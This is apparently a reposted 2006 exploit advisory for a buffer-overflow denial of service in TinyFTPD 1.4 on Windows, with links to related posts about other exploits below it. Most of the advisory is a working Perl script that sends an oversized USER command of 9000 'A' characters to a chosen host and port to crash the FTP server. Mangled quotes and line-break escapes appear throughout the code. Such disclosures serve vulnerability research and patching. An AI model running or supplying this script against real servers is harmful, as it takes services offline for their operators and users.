‘TinyFTPD USER Buffer Overflow DoS (Exploit)’

Published on May 8th, 2006
Summary

‘Tiny FTPd, is a Windows NT family FTP server.

Tiny FTPd contains a buffer overflow condition that allows remote attackers to perform DoS attacks on the server.’

Credit:

‘The original article can be found at: http://www.milw0rm.com/exploits/1758


Details

Vulnerable Systems:
 * TinyFTPD version 1.4

Exploit:
#!/bin/perl
#
# Title: TinyFTPD <= 1.4 USER command D.O.S
# Credits: [Oo]
#
#
use IO::Socket;

print ‘[i] TinyFTPD <= 1.4 USER command D.O.Sn’;
print ‘[i] coded by [Oo]n’;

if (@ARGV < 2)
{
 print ‘n[*] Usage: tinyftpd_dos.pl host portn’;
 print ‘[*] Exemple: tinyftpd_dos.pl 192.168.0.1 21n’;
 exit;
}

$ip = $ARGV[0];
$port = $ARGV[1];

$exploit = ‘(A’ x 9000;

$socket = IO::Socket::INET->new( Proto => ‘tcp’, PeerAddr => ‘$ip’, PeerPort => ‘$port’) || die ‘n[-] Connecting: Failed!n’;
print ‘n[+] Connecting: Ok!n’;
print ‘[+] Sending bad request…n’;

print $socket ‘USER $exploitn’;
sleep(5);
close($socket);

print ‘[?] DoSed?n’;’

Categories: Exploits
Tags:

Related Posts

Exploits Featured

IBM Cognos Business Intelligence 10.2.2 Cross-Site Request Forgery (CSRF) Vulnerability

Exploits

BlueBorne Kernel version v3.3-rc1 Denial Of Service Vulnerability

The native Bluetooth stack in the Linux Kernel (BlueZ), starting at the Linux kernel version 3.3-rc1 and up to and including 4.13.1, are vulnerable to a stack overflow vulnerability in the processing of L2CAP configuration responses resulting in Remote code execution in kernel space.

Exploits

X5 Webserver 5.0 Remote Denial Of Service Exploit

X5 is the latest generation web server from iMatix Corporation.The Xitami product line stretches back to 1996. X5 is built using iMatix's current Base2 technology for multithreading applications. On multicore machines,it is much more scalable than Xitami/2.